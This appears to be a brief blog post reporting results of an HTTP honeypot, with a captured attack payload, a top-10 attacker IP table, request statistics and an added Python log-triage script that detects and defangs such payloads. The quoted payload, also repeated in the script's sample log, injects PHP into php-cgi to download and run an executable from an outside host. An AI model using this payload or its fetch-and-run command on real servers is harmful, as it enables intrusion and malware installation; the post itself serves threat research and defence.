HTTP Honeypot experiment
- Matei
- Jan 21
- 1 min read
I've closed our little HTTP Honeypot experiment. Since our last report, we had an additional spike, and got some very interesting new payloads in our wordlists such as: `/cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20system('curl%20-L%20-k%20-O%20http%3A%2F%2F23.27.51.244%2Fdr0p.exe%20%26%26%20.%2Fdr0p.exe%20%7C%7C%20wget%20--no-check-certificate%20http%3A%2F%2F23.27.51.244%2Fdr0p.exe%20%26%26%20.%2Fdr0p.exe');?>`.
Check out the JoeSandbox report for the EXE that the payload above attempts to drop: https://lnkd.in/dwegSJ-2
Check out the project on GitHub, including our updated wordlist: https://lnkd.in/dTvMKMCR
Check out our draft report from last week on the HiveHack page: https://lnkd.in/dJ6SuhQk
Some additional data:
Top 10 IPs with the highest request count:

| IP | Requests |
| --- | --- |
| 146.235.220[.]43 | 7112 |
| 173.249.10[.]225 | 7111 |
| 43.134.58[.]129 | 1130 |
| 213.136.70[.]28 | 476 |
| 213.136.86[.]62 | 159 |
| 101.32.192[.]203 | 125 |
| 156.146.36[.]72 | 81 |
| 217.15.164[.]190 | 77 |
| 78.153.140[.]158 | 48 |
| 78.153.140[.]156 | 45 |
Average number of requests per hour: 57.99
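As an added example (not code from the honeypot project), here is a small triage script for the two things this post reports: it URL-decodes honeypot request paths, flags the php-cgi argument-injection pattern from the payload above and extracts the download URL as a defanged IoC, and it computes the top-IP table and the requests-per-hour average. The log lines and all addresses are constructed (RFC 5737 test ranges), and the log format, field names and the hour-span definition of the average are my assumptions.

```python
# Added example, not the honeypot project's code: triage an HTTP honeypot access
# log. Each request path is URL-decoded and checked for the php-cgi argument
# injection seen in the post (injected newlines, a Content-Type header, then an
# inline <?php block); fetch URLs are extracted defanged for an IoC list.
import re
from collections import Counter
from datetime import datetime
from urllib.parse import unquote

# Constructed sample in combined log format; all addresses are RFC 5737 test ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Jan/2025:10:00:01 +0000] "GET / HTTP/1.1" 200 12
203.0.113.5 - - [21/Jan/2025:10:05:09 +0000] "GET /cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20system('curl%20-L%20-k%20-O%20http%3A%2F%2F198.51.100.7%2Fdr0p.exe%20%26%26%20.%2Fdr0p.exe');?> HTTP/1.1" 404 0
203.0.113.9 - - [21/Jan/2025:11:30:00 +0000] "GET /robots.txt HTTP/1.1" 404 0
"""
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# After decoding: line break(s), a header line, a blank line, then PHP code.
PHP_CGI_INJECT = re.compile(r"[\r\n]+Content-Type:[^\r\n]*[\r\n]+\s*<\?php", re.I)
FETCH_URL = re.compile(r"https?://[^\s'\"]+")

def parse_log(text):
    """One dict per parseable line, with the request path URL-decoded."""
    entries = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # honeypots see plenty of malformed lines: skip, don't crash
        ip, ts, method, path, status = m.groups()
        entries.append({"ip": ip, "ts": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
                        "method": method, "status": int(status), "decoded": unquote(path)})
    return entries

def defang(url):
    """hxxp:// and bracketed dots so the IoC is not clickable by accident."""
    return re.sub(r"^http", "hxxp", url).replace(".", "[.]")

def php_cgi_hits(entries):
    """(ip, [defanged URLs the payload tries to fetch]) per matching request."""
    return [(e["ip"], [defang(u) for u in FETCH_URL.findall(e["decoded"])])
            for e in entries
            if "php-cgi" in e["decoded"].lower() and PHP_CGI_INJECT.search(e["decoded"])]

def top_ips(entries, n=10):
    return Counter(e["ip"] for e in entries).most_common(n)

def requests_per_hour(entries):
    """Requests divided by calendar hours spanned, first to last inclusive."""
    if not entries:
        return 0.0
    hours = [e["ts"].replace(minute=0, second=0, microsecond=0) for e in entries]
    span = int((max(hours) - min(hours)).total_seconds() // 3600) + 1
    return round(len(entries) / span, 2)
```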
PS: I am going to publish some more complex honeypots in the future. I would like to publish this one again, but I am seeking your advice on how to get more humans to interact with it. There are some ideas for next steps in the draft report, but I would appreciate your feedback!